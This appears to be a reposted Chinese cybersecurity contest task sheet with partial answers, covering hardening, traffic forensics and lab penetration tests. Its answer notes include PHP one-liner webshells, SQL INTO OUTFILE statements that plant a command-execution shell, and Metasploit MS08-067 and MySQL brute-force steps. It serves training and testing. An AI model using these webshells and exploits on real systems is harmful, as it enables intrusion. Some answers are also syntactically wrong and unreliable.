第45届世界技能大赛“网络安全”赛项浙江省选拔赛竞赛任务书

Posted 旺仔Sec

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了第45届世界技能大赛“网络安全”赛项浙江省选拔赛竞赛任务书相关的知识,希望对你有一定的参考价值。

第45届世界技能大赛浙江省选拔赛竞赛任务书

竞赛时间

8:00-17:00,共计9小时。

二、竞赛阶段

竞赛阶段

任务阶段

竞赛任务

竞赛时间

分值

模块A

任务1

数据库安全加固

8:00-10:00

50

任务2

文件MD5校验

50

任务3

Linux系统服务渗透测试及安全加固

100

备战阶段

模块B准备工作

10:00-11:00

0

模块B

任务1

数据分析数字取证-attack

11:00-17:00

50

任务2

Web安全之综合渗透测试-1

50

任务3

2008系统安全攻防测试

50

任务4

mysql安全测试

50

任务5

WEB渗透扫描与加固

50

任务6

Windows操作系统服务渗透测试及安全加固

50

任务7

漏洞扫描与利用

100

任务8

流量分析-misc

100

任务9

sql注入之绕过

100

任务10

文件包含之python“透视”

100

、竞赛任务书内容

(一拓扑图

 

(二)模块A

任务一:数据库安全加固

任务环境说明:

  • 服务器场景:CentOS6.8(用户名:root;密码:123456)
  • 服务器场景操作系统:CentOS6.8
  • 服务器场景操作系统安装服务:HTTP
  • 服务器场景操作系统安装服务:MYSQL
  • 渗透机场景:kali
  • 渗透机用户名:root,密码:toor
  1. 进入虚拟机操作系统:CentOS 6.8,登陆数据库(用户名:root;密码:root),查看数据库版本号,将查看数据库版本号的命令作为flag提交;

select version();

  1. 进入虚拟机操作系统:CentOS 6.8,登陆数据库(用户名:root;密码:root),查看数据库版本号,将查询到的数据库版本号作为flag提交;

  1. 进入虚拟机操作系统:CentOS 6.8,登陆数据库(用户名:root;密码:root),查看数据库列表,将查看数据库列表的命令作为flag提交;

show databases();

  1. 进入虚拟机操作系统:CentOS 6.8,登陆数据库(用户名:root;密码:root),进入mysql数据库,查看所有用户及权限,找到可以从任意 IP 地址访问的用户,将该用户的用户名作为flag提交;(如有多个可以从任意 IP 地址访问的用户,提交形式为用户名|用户名|用户名|用户名)

解法:select host,user from user where host=%;

  1. 进入虚拟机操作系统:CentOS 6.8,登陆数据库(用户名:root;密码:root),进入mysql数据库,查看所有用户及权限,找到可以从任意 IP 地址访问的用户,使用drop命令将该用户删除,将操作命令作为flag提交。

drop user xxx;

  1. 进入虚拟机操作系统:CentOS 6.8,登陆数据库(用户名:root;密码:root),进入mysql数据库,改变默认 mysql 管理员的名称,将系统的默认管理员root 改为 admin,防止被列举,将操作命令作为flag提交。

update user set user=admin where user=root;

任务二:文件MD5校验

任务环境说明:

  • 服务器场景:CentOS6.8(用户名:root;密码:123456)
  • 服务器场景操作系统:CentOS6.8
  • 服务器场景操作系统安装服务:HTTP
  • 服务器场景操作系统安装服务:MYSQL
  • 渗透机场景:kali
  • 渗透机用户名:root,密码:toor
  1. 进入虚拟机操作系统:CentOS 6.8中的/root目录,找到test.txt文件,并使用md5sum工具来计算出该文件的md5值,并将计算该文件md5的命令的字符串作为flag进行提交;

MD5sum

  1. 进入虚拟机操作系统:CentOS 6.8中的/root目录,找到test.txt文件,并使用md5sum校验工具来计算出该文件的md5值,并将计算该文件得到的md5值的字符串中前6位作为flag进行提交;

  1. 进入虚拟机操作系统:CentOS 6.8中的/root目录,将test.txt文件的文件名称改为txt.txt,然后再使用md5sum工具计算txt.txt文件的md5值,并将计算该文件得到的md5值的字符串中前5位数字和之前test.txt文件md5值的字符串中前5位数字相减的结果作为flag进行提交;

文件改名前后的md5值不会改变 md5sum只识别文件内容

  1. 进入虚拟机操作系统:CentOS 6.8,使用md5sum工具来计算/etc/passwd文件的md5值,并将改md5值导入到passwd.md5文件中,并将该命令的字符串作为flag进行提交;

md5sum /etc/passwd >passwd.md5

  1. 进入虚拟机操作系统:CentOS 6.8,创建一个新的用户,用户名为user6,密码为123456。再次计算/etc/passwd的md5值,并将该值与passwd.md5文件中的值进行对比,并将添加用户后/etc/passwd文件的md5值的字符串中前三位数字和之前/etc/passwd文件md5值的字符串中前三位数字相减的结果作为flag进行提交。

新建了用户passwd文件就会增加内容 所以会导致文件md5改变

任务三:Linux系统服务渗透测试及安全加固

任务环境说明:

  • 服务器场景名称:Centos6.5      
  • 服务器场景用户名:root;密码:123456)
  • 渗透机场景:kali
  • 渗透机用户名:root,密码:toor
  • 渗透机场景:windows 7
  • 渗透机用户名:administrator,密码:123456
  1. 连接服务器场景CentOS6.5,并对其配置YUM源,然后安装Apache服务与相关包制作安全访问的web服务,将安装命令作为Flag值提交。

yum -y install httpd mod_ssl

  1. 连接服务器场景CentOS6.5,并正确配置Apache服务,使该服务可以正常运行,将开启此服务的命令作为Flag值提交。

service httpd start

  1. 连接服务器场景CentOS6.5,将存放在/root下的abc.html文件拷贝到Apache服务主站点目录下,使页面内容可以正常访问。在本地PC渗透测试平台KALI中使用wireshark工具对其页面内容进行抓包,将服务器响应客户端数据包中网页内容中正数第二行字符串作为Flag值提交。

  1. 连接服务器场景CentOS6.5,配置一个基于SSL VPN的Apache服务,制作该服务的证书,证书名为server,秘钥设置为HBjnds,最后将制作证书的所有命令作为Flag值提交。(命令1,命令2...)

  1. 连接服务器场景CentOS6.5,将 SSL主配置文件的绝对路径作为Flag值提交。

  1. 连接服务器场景CentOS6.5,重启Apache服务,重启时会发现需要密码,猜解此密码,将正确密码作为Flag值提交。

  1. 连接服务器场景CentOS6.5,使Apache服务重启使不需要密码,将此操作所有命令作为Flag值提交。

  1. 在本地PC渗透测试平台KALI中使用wireshark工具对其页面进行第二次抓包,将加密后数据包类型作为Flag值提交。

(三模块B

任务一:数据分析数字取证-attack

任务环境说明:

  • 服务器场景:Web2003-1
  • 服务器场景操作系统:Microsoft Windows2003 Server
  • 服务器场景用户名:administrator;密码:未知(关闭链接)
  • 渗透机场景:kali
  • 渗透机用户名:root,密码:toor
  • 渗透机场景:windows 7
  • 渗透机用户名:administrator,密码:123456
  1. 使用Wireshark查看并分析Windows 7桌面下的attack.pcapng数据包文件,通过分析数据包attack.pcapng找出恶意用户的IP地址,并将恶意用户的IP地址作为FLAG(形式:[IP地址])提交:

过滤规则http.request.method=POST 思路是因为黑客下载了文件 那就肯定与post或者telnet、ssh、ftp其一有关,而三个服务都没有对应的数据包 所以肯定是使用的http网页进行下载 过滤post 源地址就是黑客地址

  1. 继续查看数据包文件attack.pacapng,分析出恶意用户扫描了哪些端口,并将全部的端口作为FLAG(形式:[端口名1,端口名2,端口名3…,端口名n])从低到高提交:

过滤规则http.flags.reset==0然后看SYN包 黑客使用了哪个端口扫描扫描了服务器哪些端口 从大到小排序得出答案

  1. 继续查看数据包文件attack.pacapng分析出恶意用户最终获得的用户名是什么,并将用户名作为FLAG(形式:[用户名])提交:

过滤规则http然后找一个长!得!好!看!的包追踪tcp流 改变流的大小会看到php一句话木马的密码以及黑客使用的账号密码

  1. 继续查看数据包文件attack.pacapng分析出恶意用户最终获得的密码是什么,并将密码作为FLAG(形式:[密码])提交:

  1. 继续查看数据包文件attack.pacapng分析出恶意用户连接一句话木马的密码是什么,并将一句话密码作为FLAG(形式:[一句话密码])提交:

这题可以用上面得方式 也可以搜索php一句话木马的关键字(eval或system)然后找到包含关键字的流进行tcp追踪 就可以看到木马的内容

  1. 继续查看数据包文件attack.pacapng分析出恶意用户下载了什么文件,并将文件名及后缀作为FLAG(形式:[文件名.后缀名])提交:

过滤POST条件 黑客下载了Q.php和flag.zip 挨个提交试试 但看文件名可以猜测就是后者

  1. 继续查看数据包文件attack.pacapng将恶意用户下载的文件里面的内容作为FLAG(形式:[文件内容])提交:

使用kali自带固件分析工具binwalk -e attack.pacapng(-e参数可以提取出包内已知格式的文件)然后cat flag.txt得到flag

任务二:Web安全之综合渗透测试

任务环境说明:

  • 服务器场景:Web2003-1
  • 服务器场景操作系统:Microsoft Windows2003 Server
  • 服务器场景用户名:administrator;密码:未知(关闭链接)
  • 渗透机场景:kali
  • 渗透机用户名:root,密码:toor
  • 渗透机场景:windows 7
  • 渗透机用户名:administrator,密码:123456
  1. 对该靶机进行WEB目录扫描,找到FLAG文件并将该文件内容作为FLAG值提交;

dirbuster进行web目录扫描 得到php.flag

  1. 构造id为2的注入点,将该注入点回显的FLAG内容作为FLAG值提交;

进入网站的首页(index.php)然后构造注入点 就会看到flag

  1. 对该靶机进行信息收集,将该靶机搭建的数据库版本信息作为FLAG值(形式:数据库版本信息)提交;

题目是说信息收集 但我不知道信息收集的方式可以获得数据库具体的版本信息 所以其实只能渗透 题目已经提示得相当明显了 在index.php已经构造了id=2的注入点 有注入点就可以用sqlmap进行注入 注入出数据库密码和网页登录密码 后面的题目迎刃而解

  1. 对该靶机进行信息收集,将该靶机web连接数据库的用户信息作为FLAG值(形式:用户信息)提交;

根据上面迎刃而解

  1. 对该靶机进行信息收集,将该靶机web连接的数据库名作为FLAG值(形式:数据库名)提交;

根据上面迎刃而解

  1. 找到存放在数据库里的FLAG值提交;

进入后台管理地址,将后台管理地址页面上显示的信息作为FLAG值提交;

根据上面迎刃而解

  1. 将该靶机存放在上传文件目录下的FLAG文件内容作为FLAG值提交;

根据上面迎刃而解

  1. 找到数据库Root用户连接数据的密码,将该密码作为FLAG值(形式:数据库密码)提交;

根据上面迎刃而解

  1. 找到存放在D盘的FLAG文件,将该FLAG文件里的内容作为FLAG值提交;

根据上面迎刃而解

任务三:2008系统安全攻防测试

任务环境说明:

  • 服务器场景名称:W-WebServ2008        
  • 服务器场景操作系统:Microsoft Windows2008 Server
  • 服务器场景用户名:administrator;密码:未知(开放链接)
  • 渗透机场景:kali
  • 渗透机用户名:root,密码:toor
  • 渗透机场景:windows 7
  • 渗透机用户名:administrator,密码:123456
  1. 利用渗透机kali中的工具对服务器进行扫描,浏览服务器web场景根目录下的upload文件下的wenjian.php页面并分析源码,form表单提交文件的动作是靠flag触发的,将flag提交;

没看懂题  有环境就应该不难了吧。。。。

  1. 通过设置代理使用burp抓包的方法上传密码为admin提交方式为POST的一句话木马,并将一句话木马的内容作为flag提交;

就是写一句话木马的源码 method和password按照题目要求

<?php

eval($_POST[admin]);

?>

  1. 使用菜刀连接上题上传的一句话木马,将服务器中wwww文件夹下的wwww.txt文件内容作为flag提交

完成了上面的题下面的就迎刃而解了 重点就在拿shell 需要注意的是第四题 Windows拿到的权限基本都是高权限 Windows不存在Apache权限 如果是Linux 通过web拿到的权限基本都是Apache权限(较低权限)

  1. 菜刀连接服务器终端,使用命令查看此时所拥有的权限,并将此时的权限作为flag提交。

  1. 通过win7桌面tool文件夹下win64.exe(使用方法为dos下输入win64 “命令”)修改服务器管理员密码,登陆服务器修改服务器的远程连接3389端口为1314,并将修改完后数据项中的变化提交(格式:原来_变化 例如:d1d_d34)

win64.exe就相当于一个pr.exe(提权工具)

重点是更改远程桌面端口 并且要用16进制进行提交

使用注册表更改远程桌面端口的方法是:找到注册表路径HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/Terminal Server/Wds/Repwd/Tds/TcpKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/Terminal Server/WinStations/RDP-tcp把PortNumber键值改成1314 然后点击16进制查看转换过后的字符 把16进制的1413作为flag提交

任务四:mysql安全测试

任务环境说明:

  • 服务器场景名称:W-WebServ2008
  • 服务器场景操作系统:Microsoft Windows2008 Server
  • 服务器场景用户名:administrator;密码:未知(开放链接)
  • 系统场景:phpstudy
  • 渗透机场景:kal0069
  • 渗透机用户名:root,密码:toor
  • 渗透机场景:win7
  • 渗透机用户名:administrator;密码:123456
  1. 利用渗透机kali中的工具确定mysql的端口,将mysql端口作为flag提交;

nmap ip 不知道有没有隐藏端口的手段

  1. 管理者曾在web界面登陆数据库,并执行了select '<?php echo \\'';system($_GET[\\'cmd\\']); echo \\'</pre>\\'; ?>' INTO OUTFIL<pre>\\E 'C:/phpstudy/WWW/test1.php'语句,结合本执行语句使用dos命令查看服务器的详细配置信息,并将服务器的系统型号作为flag提交;

此题看似牛逼哄哄 实则浪费时间 就是简单的通过into outfile写一句话木马然后uname -a就行 考点在命令的使用 一句话木马都写出来了

  1. 利用渗透机kali中的msf工具使用root目录下password.txt字典文件破解MySQL的密码,并将破解mysql的密码所需的模块当作flag提交(账户为root);

search mysql_login

auxiliary/scanner/mysql/mysql_login

  1. 利用渗透机kali中的msf工具使用root目录下password.txt字典文件破解MySQL的密码,并将mysql的密码当作flag提交(账户为root);

不建议中题目圈套  msf的爆破工具都巨慢 把参数填了就行 建议使用medusa或hydra跑

  1. 利用上题中的数据库账户密码在web界面登陆数据库,通过select '<?php @eval($_POST[admin]);?>'************ 'C:/phpstudy/WWW/shell.php'语句向服务器提交名为shell.php的一句话木马,将语句中*号的明文作为flag提交(*为大写字母或者空格);

INTO OUTFILE

  1. 使用菜刀连接上题中的shell.php,下载服务器根目录下的压缩包,将压缩包中的flag提交;

任务五:WEB渗透扫描与加固

任务环境说明:

  • 服务器场景名称:JServer2003
  • 服务器场景安全操作系统:Microsoft Windows2003 Server
  • 服务器场景用户名:administrator,密码:空
  • 渗透机场景:BT5
  • 渗透机场景用户名:Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45root,密码:toor
  1. 通过PC中渗透测试平台BackTrack5中的httprint工具对服务器场景JServer2003检测HTTP服务器(调用signatures.txt), 并将该操作显示结果“Banner Reported:”之后的字符串作为FLAG提交;

  1. 进入虚拟机操作系统: JServer2003,对httpd.conf文件进行加固(文件路径C:\\wamp\\bin\\apache\\Apache2.2.21\\httpd.conf),隐藏服务器的版本信息,将加固该文件需要添加的一行字符串作为FLAG提交;

ServerTokens Prod

  1. 进入虚拟机操作系统: JServer2003,进入WAMPSERVER控制台,Restart ALL Services。再次通过PC中渗透测试平台BackTrack5中的httprint工具对服务器场景Server2003检测HTTP服务器(调用signatures.txt), 并将该操作显示结果“Banner Reported:”之后的字符串作为FLAG提交;

httprint -h ip -s signaure.txt按照要求提交flag即可   

bt5工具花里胡哨 要看得懂help

通过PC中渗透测试平台BackTrack5中的httsqush工具对JServer2003服务器网站进行扫描渗透,并将该操作显示结果第五行“X-Powered-By:”之后的字符串作为flag提交

httsqush就是httsquash
X-Powered-By就是php版本信息

./httsquash -r ip

  1. 进入虚拟机操作系统: JServer2003,对php.ini文件进行加固(打开WAMPSERVER控制台,找到PHP文件夹下的php.ini),隐藏X-Powered-By信息,将加固该文件需要添加的一行字符串作为FLAG提交;

httsquash -U url扫描后回显的字符按照题目要求提交flag

  1. 进入虚拟机操作系统: JServer2003,进入WAMPSERVER控制台,Restart ALL Services。再次通过PC中渗透测试平台BackTrack5中的httsqush工具对JServer2003服务器网站进行扫描渗透, 并将该操作显示结果第五行的全部字符串作为FLAG提交。

任务六:Windows操作系统服务渗透测试及安全加固

任务环境说明:

  • 服务器场景名称:JServer2003
  • 服务器场景安全操作系统:Microsoft Windows2003 Server
  • 服务器场景用户名:administrator,密码:空
  • 渗透机场景:BT5
  • 渗透机场景用户名:root,密码:toor
  1. PC虚拟机操作系统Backtrack5打开wireshark,验证监听到PC虚拟机操作系统Windows 7通过Internet Explorer访问JServer2003服务器场景的Test.html页面内容,并将wireshark监听到的Test.html页面内容在wireshark程序当中的显示结果倒数第4行的英文单词作为FLAG值提交;

  1. 在PC虚拟机操作系统Windows 7和JServer2003服务器场景之间建立SSL VPN,须通过CA服务颁发证书;JServer2003服务器的域名为www.test.com,并将JServer2003服务器个人证书信息中的“颁发者:”内容作为FLAG值提交;

  1. 在PC虚拟机操作系统Windows 7和JServer2003服务器场景之间建立SSL VPN,PC(虚拟机:Backtrack5)打开Wireshark工具,监听PC(虚拟机:Windows 7)通过Internet Explorer访问服务器场景JServer2003的Test.html页面,同时使用PC(虚拟机:Backtrack5)的Wireshark工具对HTTP请求数据包进行分析,将Wireshark工具中显示该流量的协议名称作为Flag提交;

  1. PC(虚拟机:Backtrack5)验证此时wireshark无法明文监听到Windows 7的Internet Explorer访问JServer2003服务器场景的HTTP流量,并将JServer2003服务器场景通过SSL Record Layer对Internet Explorer请求响应的加密应用层数据长度(Length)值作为FLAG值提交。

任务七:漏洞扫描与利用

任务环境说明:

  • 服务器场景名:Jtest
  • 服务器场景操作系统:Microsoft Windows2003 Server
  • 服务器场景用户名:(用户名:administrator;密码:空)
  • 渗透机场景:kali
  • 渗透机用户名:root,密码:toor
  1. 通过本地PC中渗透测试平台Kali对服务器场景server2003以半开放式不进行ping的扫描方式并配合a,要求扫描信息输出格式为xml文件格式,从生成扫描结果获取局域网(例如172.16.101.0/24)中存活靶机,以xml格式向指定文件输出信息(使用工具NMAP,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为FLAG提交(各参数之间用英文逗号分割,例a,b,c,d); 

sS,Pn,oX

  1. 根据第一题扫描的回显信息分析靶机操作系统版本信息,将操作系统版本信息作为FLAG提交; 

  1. 根据第一题扫描的回显信息分析靶机服务开放端口,分析开放的服务,并将共享服务的开放状态作为FLAG提交; 

open/close/filtered

  1. 在本地PC的渗透测试平台Kali中,使用命令初始化msf数据库,并将使用的命令作为FLAG提交; 

msfdb init

  1. 在本地PC的渗透测试平台Kali中,打开msf,使用db_import将扫描结果导入到数据库中,并查看导入的数据,将查看导入的数据要使用的命令作为FLAG提交; 

db_import [文件]

  1. 在msfconsole使用search命令搜索MS08067漏洞攻击程序,并将回显结果中的漏洞时间作为FLAG提交; 

Search ms08-067

或者直接使用模块然后info查看Discover项

  1. 在msfconsole中利用MS08067漏洞攻击模块,将调用此模块的命令作为FLAG提交; 

Use exploit/windows/smb/ms08_067_netapi

  1. 在上一步的基础上查看需要设置的选项,并将回显中需设置的选项名作为FLAG提交; 

show options 参数中状态为yes 而默认没有填的参数就是要设置的

  1. 使用set命令设置目标IP(在第8步的基础上),并检测漏洞是否存在,将回显结果中最后四个单词作为FLAG提交; 

exploit后查看即可

  1. 查看可选项中存在此漏洞的系统版本,判断该靶机是否有此漏洞,若有,将存在此漏洞的系统版本序号作为FLAG提交,否则FLAG为none。

   show targets 

任务八:流量分析- misc

任务环境说明:

  • 服务器场景名:Jtest
  • 服务器场景操作系统:Microsoft Windows2003 Server
  • 服务器场景用户名:(用户名:administrator;密码:空)
  • 渗透机场景:kali
  • 渗透机用户名:root,密码:toor
  1. 通过本地PC中渗透测试平台Kali访问目标靶机http://xxx.xxx.xxx.xxx:8081(xxx.xxx.xxx.xxx为靶机IP地址,例如172.16.101.1:8081)下载文件获取流量包。将流量包进行解压,获取流量包中的文件名作为Flag(形式:文件名.文件类型)提交;

  1. 通过本地PC中渗透测试平台Kali中利用wireshark从服务器场景Windows2003中下载的流量包进行流量包分析,使用HTTP模式下的过滤表达式过滤HTTP GET方法的流量包,过滤表达式命令作为Flag提交。

http.request.method=GET

  1. 根据第2步回显信息从过滤出的流量包中分析,找到flag文件流量的IP地址,并将该HTTP流量包(第1步中下载的流量包)含flag信息的请求源ip作为Flag提交。

  1. 在渗透测试平台Kali中利用wireshark从包含flag信息的流量包中的IP数据包中找到目标信息文件,并将该文件名作为Flag(形式:文件名.文件类型)提交。

  1. 在渗透测试平台Kali中使用wireshark分析下载的流量包,并从包含flag信息的GET/POST请求流量中找出响应IP及响应内容,并将该flag请求的响应IP(流量包中的IP)作为flag提交。

  1. 使用wireshark工具分析响应流量包(第5步flag请求对应的response响应流量数据包)中的数据内容,将该响应数据中的文件名,作为Flag(形式:文件名.文件类型)提交。

  1. 使用wireshark工具提取流量包中内容(即第6步响应流量包中的文件内容),将该提取操作必须使用的到的wireshark功能的快捷键作为Flag提交。(xx+xx为Flag提交格式,例如ctrl+alt+F4)D。

  1. 将第7步提取出的文件进行解压,将该文件解压后的文件内容第一行作为flag提交;

任务九:sql注入之绕过

任务环境说明:

  • 服务器场景名称:python08
  • 服务器场景操作系统:Microsoft Windows2008 Server
  • 服务器场景用户名:administrator;密码:未知
  • 渗透机场景:kali
  • 渗透机用户名:root,密码:toor
  • 渗透机场景:windows 7
  • 渗透机用户名:administrator,密码:123456
  1. 使用渗透机场景kali中工具扫描服务器场景,打开搜索页面,并将页面url做为flag提交(IP地址不提交例如:http:123.com:8080/a/b/a.html提交/a/b/a.html);

  1. 使用渗透机场景windows7访问服务器场景搜索页面,利用该页面的漏洞,查询数据库的字段,并将字段数作为flag提交;

Show tables;

  1. 使用渗透机场景windows7访问服务其场景搜索页面,利用该页面漏洞,查询数据库的名称,并将数据库名称作为flag提交;

show databases;

  1. 使用渗透机场景windows7访问服务器场景搜索页面,利用该页面漏洞,查询数据库中的表,并将表中的flag提交(格式:flag1_flag2_flag3...);

  1. 使用渗透机场景windows7访问服务器场景搜索页面,手动进行尝试其他漏洞,并将漏洞名称作为flag提交;

  1. 使用渗透机场景windows7访问服务器场景chanllege.php页面,根据提示找到flag并提交;

任务十:文件包含之python“透视”

任务环境说明:

  • 服务器场景名称:python08
  • 服务器场景操作系统:Microsoft Windows2008 Server
  • 服务器场景用户名:administrator;密码:未知
  • 渗透机场景:kali
  • 渗透机用户名:root,密码:toor
  • 渗透机场景:windows 7
  • 渗透机用户名:administrator,密码:123456
  1. 使用渗透机场景kali中工具扫描服务器,将服务器场景对的web端口作为flag提交;

  1. 使用渗透机场景kali中工具扫描服务器场景,打开about.php页面,并将页面中的flag提交;

  1. 使用渗透机场景kali访问服务器场景about.php页面,利用该页面的漏洞查看位于根目录中的number文件夹中的number.txt,并将其内容的md5值作为flag提交;

  1. 使用渗透机场景Windows7访问服务器场景about.php页面,利用该页面的漏洞查看当前目录下的mima.bak文件,并根据其内容的下载某个压缩包,将压缩包中的文件个数作为flag提交;

  1. 使用渗透机场景kali完善root目录下的crc32碰撞脚本crc32.py,填写该文件当中空缺的FLAG1字符串,并将改字符串作为flag提交(结合第九题填写);

  1. 使用渗透机场景kali完善root目录下的的crc32碰撞脚本crc32.py,填写该文件当中空缺的FLAG2字符串,并将改字符串作为flag提交(结合第九题填写);

  1. 使用渗透机场景kali完善root目录下的的crc32碰撞脚本crc32.py,填写该文件当中空缺的FLAG3字符串,并将改字符串作为flag提交(结合第九题填写);

  1. 使用渗透机场景kali完善root目录下的crc32碰撞脚本crc32.py,填写该文件当中空缺的FLAG4字符串,并将改字符串作为flag提交(结合第九题填写);

   

  1. 使用渗透机场景kali运行完善后的crc32.py文件(碰撞mima6.txt),并将运行后的结果作为flag提交;

2022-2023 年度广东省职业院校学生专业技能大赛中职组“网络安全”赛项竞赛任务书(样题)

2022-2023 年度广东省职业院校学生专业技能大赛中职组“网络安全”赛项竞赛任务书(样题)

 一、竞赛时间

总计:210 分钟

二、竞赛阶段

竞赛阶段

任务阶段

竞赛任务

竞赛时间

分值

A 模块

A-1

登录安全加固

90 分钟

200 分

A-2

Web 安全加固(Web)

A-3

流量完整性保护与事件监控

(Web,Log)

A-4

防火墙策略

A-5

数据库加固(Linux)

A-6

服务加固 SSH\\VSFTPD(Linux)

B 模块

B-1

Web 渗透测试

400 分

B-2

内存取证

B-3

Windows 操作系统渗透测试

B-4

Linux 操作系统渗透测试

B-5

事件分析应急响应

B-6

Reverse

阶段切换

30 分钟

C 模块

C 模块

CTF 夺旗-攻击

90 分钟

200 分

D 模块

D 模块

CTF 夺旗-防御

200 分

三、竞赛任务书内容

(一)拓扑图

 

 

(二)A 模块基础设施设置/安全加固(200 分

一、项目和任务描述:

假定你是某企业的网络安全工程师,对于企业的服务器系统,根据任务要求确保各服务正常运行,并通过综合运用登录和密码策略、流量完整性保护策略、事件监控策略、防火墙策略等多种安全策略来提升服务器系统的网络安全防御能力。

二、服务器环境说明

LOG(Linux):用户名:root 密码:root

Web(Windows):用户名:administrator 密码:P@ssw0rd

三、说明:

  1. 所有截图要求截图界面字体清晰,并粘贴于相应题目要求的位置;
  2. 文件名命名及保存:网络安全模块 A-XX(XX 为工位号),PDF 格式保存;
  3. 文件保存到 U 盘提交。

  1. 任务一 登录安全加固

请对服务器 Web 按要求进行相应的设置,提高服务器的安全性。1.密码策略(Web)

a.最小密码长度不少于 8 个字符,将密码长度最小值的属性配置界面截图; b.密码策略必须同时满足大小写字母、数字、特殊字符,将密码必须符合复

杂性要求的属性配置界面截图。2.登录策略(Web)

  1. 在用户登录系统时,应该有“For authorized users only”提示信息,将登录系统时系统弹出警告信息窗口截图;
  2. 一分钟内仅允许 5 次登录失败的尝试,超过 5 次,登录帐号锁定 1 分钟, 将账户锁定策略配置界面截图;
  3. 远程用户非活动会话连接超时应小于等于 5 分钟,将 RDP-Tcp 属性对应的配置界面截图。
  1. 用户安全管理(Web)
    1. 对服务器进行远程管理安全性 SSL 加固,防止敏感信息泄露被监听,将RDP-Tcp 属性对应的配置界面截图;
    2. 仅允许超级管理员账号关闭系统,将关闭系统属性的配置界面截图。

  1. 任务二  Web 安全加固(Web)

  1. 为了防止 web 中.mdb 数据库文件非法下载,请对 Web 配置文件进行安全加固,将 C:\\Windows\\System32\\inetsrv\\config\\applicationHost 配置文件中对应的部分截图;
  2. 限制目录执行权限,对 picture 和 upload 目录设置执行权限为无,将编辑功能权限的配置界面截图;
  3. 开启 IIS 的日志审计记录(日志文件保存格式为 W3C,只记录日期、时间、客户端 IP 地址、用户名、方法),将 W3C 日志记录字段的配置界面截图;
  4. 为了减轻网站负载,设置网站最大并发连接数为 1000,将编辑网站限制的配置界面截图;
  5. 防止文件枚举漏洞枚举网络服务器根目录文件,禁止 IIS 短文件名泄露, 将配置命令截图;
  6. 关闭 IIS 的 WebDAV 功能增强网站的安全性,将警报提示信息截图。

  1. 任务三  流量完整性保护与事件监控Web,Log

  1. 为了防止密码在登录或者传输信息时被窃取,仅使用证书登录 SSH(Log),将/etc/ssh/sshd_config 配置文件中对应的部分截图;
  2. 将 Web 服务器开启审核策略登录事件 成功/失败;

特权使用 成功;

策略更改 成功/失败; 进程跟踪 成功/失败;

将审核策略的配置界面截图;

  1. 配置 Splunk 接收 Web 服务器,安全日志,系统日志,CPU 负载,内存,磁盘空间,网络状态。将转发器:部署成功的页面截图。

  1. 任务四 防火墙策略

所有服务器开启防火墙,为防止勒索病毒攻击对防火墙进行加固策略: 1.Windows 系统禁用 445 端口,将防火墙入站规则截图;

2.Linux 系统禁用 23 端口,将 iptables 配置命令截图; 3.Linux 系统禁止别人 ping 通,将 iptables 配置命令截图;

4.Linux 系统为确保安全禁止所有人连接 SSH 除了 172.16.1.1 这个 ip,将iptables 配置命令截图。

  1. 任务五  数据库加固(Linux

  1. 删除默认数据库(test);
  2. 改变默认 MySql 管理员用户为:SuperRoot;
  3. 使用 MySql 内置 MD5 加密函数加密用户 user1 的密码为(P@ssw0rd1!);
  4. 赋予 user1 用户对数据库所有表只有 select、insert、delete、update 权

限;

  1. 对忘记 mysql 数据库 SuperRoot 管理员密码进行重置操作;

  1. 任务六  服务加固  SSH\\VSFTPDLinux

1.SSH 服务加固

  1. SSH 禁止 root 用户远程登录。
  2. 设置 root 用户的计划任务。每天早上 7:50 自动开启 SSH 服务,22:50关闭;每周六的 7:30 重新启动 SSH 服务。
  3. 修改 SSH 服务端口为 2222。2.VSFTPD 服务加固
  1. 设置数据连接的超时时间为 2 分钟、无任何操作的超时时间为 5 分钟。
  2. 设置站点本地用户访问的最大传输速率为 1M。
  3. 禁止匿名用户登录。
  4. 关闭 ascii 模式下载,防止被用于 DoS 攻击。

(二)实操技能-B 模块(400 分

任务一:Web 渗透测试

任务环境说明:

√ 服务器场景:Server03

√ 服务器场景操作系统:未知(关闭连接)

通过本地 PC 中的渗透测试平台 Kali 对靶机进行 WEB 渗透,找到页面内的文件上传漏洞并且尝试进行上传攻击,将文件上传成功后的页面回显字符串作为Flag 提交(如:点击超链接查看上传文件)

通过本地 PC 中的渗透测试平台 Kali 对靶机进行 WEB 渗透,找到页面内的文件上传漏洞并且尝试进行上传攻击,使用相关的渗透测试手段,获取到 WEB 权限, 使用 WHOAMI 获取 WEB 当前的用户权限,并作为 Flag 进行提交;

通过本地 PC 中的渗透测试平台 Kali 对靶机进行 WEB 渗透,找到页面内的文件上传漏洞并且尝试进行上传攻击,使用相关的渗透测试手段,获取到 WEB 权限, 使用相关指令获取到当前 linux 用户 UID 为 5 的用户,将该用户的用户名称作为Flag 进行提交;

通过本地 PC 中的渗透测试平台 Kali 对靶机进行 WEB 渗透,找到页面内的文件上传漏洞并且尝试进行上传攻击,使用相关的渗透测试手段,获取到 WEB 权限, 使用相关指令查看后台首页文件,将该文件的第二行的所有字符串作为 Flag 进行提交;

任务二:内存取证

任务环境说明:

√服务器场景:System0101

√服务器场景操作系统:未知

√FTP 账号:anonymous,密码:空

  1. 从 FTP 下载 mem.raw,利用分析工具进行分析,将最有可能的操作系统名称作为 Flag 进行提交,Flag 格式为 flagxxx;
  2. 从 FTP 下载 mem.raw,利用分析工具进行分析,将可疑进程画图中获得的信息作为 Flag 进行提交,Flag 格式为 flagxxx;
  3. 从 FTP 下载 mem.raw,利用分析工具进行分析,将将可疑进程记事本中获得的信息作为 Flag 进行提交,Flag 格式为 flagxxx;
  4. 从 FTP 下载 mem.raw,利用分析工具进行分析,将可疑进程中获得的密钥作为 Flag 进行提交,Flag 格式为 flagxxx;
  5. 从 FTP 下载 mem.raw,利用分析工具进行分析,将加密算法作为 Flag 进行提交,Flag 格式为 flagxxx;
  1. 从 FTP 下载 mem.raw,利用分析工具进行分析,将获得的获得的压缩包的文件名作为 Flag 进行提交,Flag 格式为 flagxxx;
  2. 从 FTP 下载 mem.raw,利用分析工具进行分析,将获得的压缩包内文件的内容作为 Flag 进行提交,Flag 格式为 flagxxx。

任务三:Windows 操作系统渗透

任务环境说明:

√服务器场景:Server05

√服务器场景操作系统:Windows(版本不详)(封闭靶机)

  1. 通过本地PC 中渗透测试平台Kali 对服务器场景进行系统服务及版本扫描渗透测试,并将该操作显示结果中 445 端口对应的服务版本信息字符串作为 Flag 值提交;
